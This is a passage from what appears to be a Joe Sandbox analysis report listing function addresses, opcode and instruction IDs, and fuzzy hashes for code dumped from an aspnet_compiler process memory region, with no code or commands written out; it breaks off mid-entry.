                                                              • Opcode ID: 885a73430e193eea22b6dbee7aace336bbdf92d840ba2d7b909d449523e6cc25
                                                              • Instruction ID: 159650bfb4acb2a70506cd8cc7bdb36f1f458241f623d0acad5cf34ac82e0b0f
                                                              • Opcode Fuzzy Hash: 885a73430e193eea22b6dbee7aace336bbdf92d840ba2d7b909d449523e6cc25
                                                              • Instruction Fuzzy Hash: 1CD0C2334C10207ACB27E6197D04F932A5A9B54270F064860F20892028D524DC8182C4
                                                              Function 019D823B Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction ID: 43a02c3925834a6d9322a7f1e69c507fd11908b477efa20ed6615466ba1f0924
                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction Fuzzy Hash: 84E0C231500A21EFDB322F2DDD00F5176A5FFA4BA0F118C2AF28A060A98774AC81CB54
                                                              Function 019E2050 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a2a4d4304bf8a801e52cb7bc7498068f52f0a6678ff85c474d718bd2b283e769
                                                              • Instruction ID: 20f5a13c45f3fa31fb636e07e4bec8a3472d66bd6a8995d2e58e0331bf397e8f
                                                              • Opcode Fuzzy Hash: a2a4d4304bf8a801e52cb7bc7498068f52f0a6678ff85c474d718bd2b283e769
                                                              • Instruction Fuzzy Hash: 7FE08C321008506BC612FB5DDD10F5A739EEBE4660F010225B15997290CA24AD01C794
                                                              Function 01A18A90 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction ID: be67f9841248b9acbfc4c670c9624b123cf69aea94b5ef6a50cd43c275bb97f2
                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction Fuzzy Hash: ADE08633111A1487C728DE18D511B7277A4EF45720F09463EA61347784C634E544C794
                                                              Function 01A36AA4 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                              • Instruction ID: 4ca5ddd40b197e3b199277bea468899214c2342da6b046ad94697ad8ae634303
                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                              • Instruction Fuzzy Hash: 35D05E36911A50AFC7329F1BEA00D13BBF9FBC4A20706062EA54983920C670A906CBA0
                                                              Function 01A1E59C Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction ID: 932eccdc5288382cce3ebed465c9f270a155ed053a03504b4e8b64633d22f594
                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction Fuzzy Hash: 71D0A932618620ABDB72AA1CFC00FC333E8BB88760F060459B408CB050C374AC81CA84
                                                              Function 01A5E908 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction ID: 65cc4c57b8c04007058680cadc2357433705d64f5bb3b13ae37109ab7f17f1a4
                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction Fuzzy Hash: 98E0EC35954685EBDF52DF59D644F5AFBF5BB98B40F150058A5089B660C634AA00CB40
                                                              Function 019DA0E3 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction ID: 274e00a176e57f7ce7dcb8f5ad402f165a52e120e3bdfa707cd23655ec40a2bd
                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction Fuzzy Hash: F0D02233226031A3CF285665A910F636909ABC1AA0F0A002C390E93800C0088C42C2E0
                                                              Function 01A1A830 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction ID: 05be870cb5e32f696f8ec25ac094aea1c975b30124cbdec7e91c13d2189d928a
                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction Fuzzy Hash: 91D012371E054DBBCB119F66DC01F957BA9E7A4BA0F454020BA08875A0C63AE950D684
                                                              Function 01A1CA24 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1ef05556d55b0c46c102690462b3b36b7508f44bfa850b39fde3cb41de8a782
                                                              • Instruction ID: 95b5fbec26819acc1ca7c52563f25b37374b0f9b24d5a580e21bf3d34866a48d
                                                              • Opcode Fuzzy Hash: e1ef05556d55b0c46c102690462b3b36b7508f44bfa850b39fde3cb41de8a782
                                                              • Instruction Fuzzy Hash: BDD0A935A9A402DBDF2BCF0ACA20E2E3AB1FB10650F40006CEF4192029E33CEC02CB00
                                                              Function 019F02A0 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction ID: 037c3993eebbc109b67f8bf1271465462cda4967fcfb73a0eddce428dd27d841
                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction Fuzzy Hash: 78D0C939252E80DFD61BCB0CC5A4B5533BCFB84B45F890494F505CBB22D62CD940CA10
                                                              Function 01A1C700 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction ID: a9e76a5cffe344fdbb51f8f2f1a967ad056016078688745fd7bc0d89d83a2fbf
                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction Fuzzy Hash: 91C01232150644AFC7119A95CD01F0177A9E798B50F010021F70447570C535E910D644
                                                              Function 01A00310 Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction ID: 7b969853ad8b96e90574ba4f246467873afef3bff2ad4f49959323f854f8df74
                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction Fuzzy Hash: C2D01236100248EFCB02DF41D990E9A772AFBD8750F109019FD1907650CA31ED62DA50
                                                              Function 019E0750 Relevance: .0, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction ID: 023ad89f624ce2649e50a46aab610098457c8532539a8d482a36d93117f0645f
                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction Fuzzy Hash: DEC04879701A428FCF16DB2AE294F5977E4FB84740F150890E909CBB22E628E901CA10
                                                              Function 01AB4DAD Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                              • Instruction ID: b01379f97eb1e198e529a0c3e7743bcde59fd077cdd01e0f27de323f73e56fa2
                                                              • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                              • Instruction Fuzzy Hash: 61B01232212645CFC7036760CB08B1832A9BF157C0F0900F0650089870D6288910E501
                                                              Function 01A24340 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 06df720567649793fb839410f39740a2e8af79caa1113fce1945fb1be6e09961
                                                              • Instruction ID: 6f37d030d8e2e86f7f758ff262802249e17fd2890f0ea6cef890d1614890ada8
                                                              • Opcode Fuzzy Hash: 06df720567649793fb839410f39740a2e8af79caa1113fce1945fb1be6e09961
                                                              • Instruction Fuzzy Hash: 66900231A05800129140715848846464015A7E0301F56C111F0428554CCA188A576361
                                                              Function 01A24650 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 817ce887b32ebf12b2de2d4507c49e340f00cdc1a86ba5359466b2863a5030eb
                                                              • Instruction ID: d203372be54a9ac45152350f02bdda4233443d484508936f23f76e9680b90936
                                                              • Opcode Fuzzy Hash: 817ce887b32ebf12b2de2d4507c49e340f00cdc1a86ba5359466b2863a5030eb
                                                              • Instruction Fuzzy Hash: 5A900261A01500424140715848045066015A7E1301796C215B0558560CC61C8956A369
                                                              Function 01A22BA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a95edea1d381ae03ebac81f155f4ee2bd0b65a7e76e03c96b2566062d923305
                                                              • Instruction ID: 285d5b57163b01213c120d054dfb6a16954ceca3afb8f919ca4d1a32f2becaec
                                                              • Opcode Fuzzy Hash: 3a95edea1d381ae03ebac81f155f4ee2bd0b65a7e76e03c96b2566062d923305
                                                              • Instruction Fuzzy Hash: 05900231A0540802D15071584414746001597D0301F56C111B0028654DC7598B5677A1
                                                              Function 01A22B80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a471afdf89a4d99237ff8f72f8e41d88efe1b05e7ce28daf452e33000f4e2c3
                                                              • Instruction ID: 4186bd438fddf47b96633ad78ecef55b8b1bdd42de7b9f2f8b8bc783dbfec33d
                                                              • Opcode Fuzzy Hash: 0a471afdf89a4d99237ff8f72f8e41d88efe1b05e7ce28daf452e33000f4e2c3
                                                              • Instruction Fuzzy Hash: 8090023160140802D10471584804786001597D0301F56C111B6028655ED66989927231
                                                              Function 01A22BE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd22c2d902706356dfe5dfbb5d9b47021656e6dda93fa550efc99906410081b3
                                                              • Instruction ID: 002b4eb777569dc3ea852d02abadc5b8aabcb63a20aaa584835c4a9a34311eef
                                                              • Opcode Fuzzy Hash: fd22c2d902706356dfe5dfbb5d9b47021656e6dda93fa550efc99906410081b3
                                                              • Instruction Fuzzy Hash: 9190023160544842D14071584404B46002597D0305F56C111B0068694DD6298E56B761
                                                              Function 01A22BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54cd0c5b3911f9edee34cb03bbb3024828b56e26afa84a8156e3ab249c3f7029
                                                              • Instruction ID: d39da94478d81ee03d17c5b9ffbf2e6b83273aef61be315275a60b5ec923aa98
                                                              • Opcode Fuzzy Hash: 54cd0c5b3911f9edee34cb03bbb3024828b56e26afa84a8156e3ab249c3f7029
                                                              • Instruction Fuzzy Hash: 8F90023160140802D1807158440474A001597D1301F96C115B0029654DCA198B5A77A1
                                                              Function 01A22AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f09ff62da48918c1abc02013bcb203c2a76947996bfcf7f63f185e4f90d1a29
                                                              • Instruction ID: cba12eb8d832064e1bd0cb5793a00f76086d906a90dad781caa3dfdb1d3826cd
                                                              • Opcode Fuzzy Hash: 0f09ff62da48918c1abc02013bcb203c2a76947996bfcf7f63f185e4f90d1a29
                                                              • Instruction Fuzzy Hash: C99002A1601540924500B2588404B0A451597E0201F56C116F1058560CC5298952A235
                                                              Function 01A22AF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a4e006aae7525326c120084e32a2b2ded464aaf23875e8dd2187bec64cbb5af
                                                              • Instruction ID: 2e724267d4f3b52931b17a45a47e0f538b366b327f2ce9098836cb8f53afb8c1
                                                              • Opcode Fuzzy Hash: 3a4e006aae7525326c120084e32a2b2ded464aaf23875e8dd2187bec64cbb5af
                                                              • Instruction Fuzzy Hash: 88900225621400020145B558060460B0455A7D6351796C115F141A590CC62589666321
                                                              Function 01A22AD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9063aa92a2358a00e48289e317f44ba7bdc60c3bad90dbebb8f25d5a68dc9ec
                                                              • Instruction ID: bf96ee63d46f7e76e00365c3d7016613b303d9348e88f9404f48af9d9f1eedfe
                                                              • Opcode Fuzzy Hash: a9063aa92a2358a00e48289e317f44ba7bdc60c3bad90dbebb8f25d5a68dc9ec
                                                              • Instruction Fuzzy Hash: DB900435711400030105F55C07047070057D7D5351757C131F101D550CD735CD737331
                                                              Function 01A22DB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 57f3a10b79bbc68451c95ac9316b2474f8e30648cecd790c11e740395e226363
                                                              • Instruction ID: 7cecd0cde09121ea00695b4ff1a82d0f8739523dc655a09e1de0f4a5ae41cd9c
                                                              • Opcode Fuzzy Hash: 57f3a10b79bbc68451c95ac9316b2474f8e30648cecd790c11e740395e226363
                                                              • Instruction Fuzzy Hash: 1490023164140402D141715844047060019A7D0241F96C112B0428554EC6598B57BB61
                                                              Function 01A22DD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65fb186c9a0cff96255c3ba435a04406155e1625779291de4d627712075f0961
                                                              • Instruction ID: 75724a6374dbcf6ac54fe4e1a3e69f1c88db8a02fba0ba506a94422fde050f7f
                                                              • Opcode Fuzzy Hash: 65fb186c9a0cff96255c3ba435a04406155e1625779291de4d627712075f0961
                                                              • Instruction Fuzzy Hash: 31900221642441525545B15844046074016A7E0241B96C112B1418950CC52A9957E721
                                                              Function 01A22D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b389484a534caa934c474612c2f5bb80d6c59a8f771b9333a90b51f0cacc7c21
                                                              • Instruction ID: a474420a9d9a296e34d5ec9cc4839fa19b5b7ddac1e4642167f0e7c76a4c27b1
                                                              • Opcode Fuzzy Hash: b389484a534caa934c474612c2f5bb80d6c59a8f771b9333a90b51f0cacc7c21
                                                              • Instruction Fuzzy Hash: 9B90022170140003D140715854187064015E7E1301F56D111F0418554CD91989576322
                                                              Function 01A22D00 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f22b0ebb9eac295eee3939b5d8d68341b6241141a20f69141c8795e210918ea
                                                              • Instruction ID: 6a826da617231a136ae85b5f9a4004b0a12d90a6e751da490647c988e232a464
                                                              • Opcode Fuzzy Hash: 2f22b0ebb9eac295eee3939b5d8d68341b6241141a20f69141c8795e210918ea
                                                              • Instruction Fuzzy Hash: 8990022160544442D10075585408B06001597D0205F56D111B1068595DC6398952B231
                                                              Function 01A22D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29f5e6604fae9e66a4ee782b6b09fb34c558ce05fe6daf090f931cea20577b15
                                                              • Instruction ID: e59daad0b45ab05832cdd42cf8356a111a4aafc22c6b3bd65848a07cfd5be560
                                                              • Opcode Fuzzy Hash: 29f5e6604fae9e66a4ee782b6b09fb34c558ce05fe6daf090f931cea20577b15
                                                              • Instruction Fuzzy Hash: 0A90022961340002D1807158540870A001597D1202F96D515B0019558CC919896A6321
                                                              Function 01A22CA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a12e8fa2e0c6589e7b9a9cb1bc82fe9cbea2ec92ba1ce2f1b7f3ba0cea39d09f
                                                              • Instruction ID: 368fbd4991cc3ac5c49f4253dea178d01d551c7cf3260ff5fc23ef01099a2010
                                                              • Opcode Fuzzy Hash: a12e8fa2e0c6589e7b9a9cb1bc82fe9cbea2ec92ba1ce2f1b7f3ba0cea39d09f
                                                              • Instruction Fuzzy Hash: 9E90023160140402D10075985408746001597E0301F56D111B5028555EC66989927231
                                                              Function 01A22CF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c2a7eec1e7a8b9fbc4072e27c621e8b23ac68e97da20b977d10223d7d910ca2
                                                              • Instruction ID: 385fccf26379af753eaef4ad7160893a55d28e6655dca80d0ae2c7fb5f75c1c2
                                                              • Opcode Fuzzy Hash: 4c2a7eec1e7a8b9fbc4072e27c621e8b23ac68e97da20b977d10223d7d910ca2
                                                              • Instruction Fuzzy Hash: 4290023160140403D10071585508707001597D0201F56D511B0428558DD65A89527221
                                                              Function 01A22CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f8f77148b80534aaf6f3b4d70c70b18f755c0e3ff1b61512f8c9849abe91bcd
                                                              • Instruction ID: 1fb22ca625991737077971289b5d788e69434292512b004bdb0f6da70db11180
                                                              • Opcode Fuzzy Hash: 5f8f77148b80534aaf6f3b4d70c70b18f755c0e3ff1b61512f8c9849abe91bcd
                                                              • Instruction Fuzzy Hash: BE900221A0540402D14071585418706002597D0201F56D111B0028554DC65D8B5677A1
                                                              Function 01A22C60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2cf3d5c79e0b6a4601833691ca0259181ee193dee239df025aeee2ead1328f8e
                                                              • Instruction ID: 672a6156369efcf2e96d0c3b31a3c704d4548e90126b809d826f253be8fb006e
